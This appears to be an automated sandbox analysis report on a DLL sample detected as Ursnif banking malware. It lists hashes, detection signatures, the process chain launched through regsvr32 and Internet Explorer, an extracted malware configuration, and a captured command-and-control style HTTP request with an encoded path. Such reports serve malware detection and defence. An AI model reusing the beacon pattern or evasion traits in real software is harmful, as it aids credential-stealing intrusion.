Loading ...

Play interactive tourEdit tour

Analysis Report 0pz1on1.dll

Overview

General Information

Sample Name:0pz1on1.dll
Analysis ID:320211
MD5:3c4804307010574bc5c94c57ea8d3135
SHA1:52163b920bac82132f76d1bd8d1978fe5ab88667
SHA256:733cbecbe9469a90f40dc38448866df368238aac203fa9c986cd6b45d8057aa7
Tags:dllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Creates a COM Internet Explorer object
Machine Learning detection for sample
PE file has a writeable .text section
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6936 cmdline: loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll' MD5: 62442CB29236B024E992A556DA72B97A)
    • regsvr32.exe (PID: 6944 cmdline: regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • cmd.exe (PID: 6952 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6972 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 7044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6212 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "250162", "uptime": "351ceL", "crc": "1", "id": "7238", "user": "4229768108f8d2d8cdc8873a31eb82f6", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: regsvr32.exe.6944.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "351ceL", "crc": "1", "id": "7238", "user": "4229768108f8d2d8cdc8873a31eb82f6", "soft": "3"}
            Source: regsvr32.exe.6944.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "351ceL", "crc": "1", "id": "7238", "user": "4229768108f8d2d8cdc8873a31eb82f6", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 0pz1on1.dllVirustotal: Detection: 12%Perma Link
            Source: 0pz1on1.dllVirustotal: Detection: 12%Perma Link
            Machine Learning detection for sampleShow sources
            Source: 0pz1on1.dllJoe Sandbox ML: detected
            Source: 0pz1on1.dllJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_026F523B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_026F523B

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /images/lcFsCCu6XNM4pzjDX9/Rf920MsPd/vgweJGGW4yMpnFFbKRdb/rMLnID4pno1jhDPg_2B/gCtnp5OejYlg5M0Xpnwv8O/gpi95pzZNi_2F/y_2F9cQy/vDMvSxl_2BNU9G_2FwH_2BP/AZJJtDQfBY/TKL237DbsWcS1Nmtn/Au9.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/lcFsCCu6XNM4pzjDX9/Rf920MsPd/vgweJGGW4yMpnFFbKRdb/rMLnID4pno1jhDPg_2B/gCtnp5OejYlg5M0Xpnwv8O/gpi95pzZNi_2F/y_2F9cQy/vDMvSxl_2BNU9G_2FwH_2BP/AZJJtDQfBY/TKL237DbsWcS1Nmtn/Au9.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
            Source: 0pz1on1.dllString found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
            Source: {99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: 0pz1on1.dllString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
            Source: 0pz1on1.dllString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
            Source: 0pz1on1.dllString found in binary or memory: http://www.bullguard.com0
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository/0
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository/03
            Source: 0pz1on1.dllString found in binary or memory: http://www.globalsign.net/repository09
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: iab2Data[1].json.6.drString found in binary or memory: https://bealion.com/politica-de-cookies
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
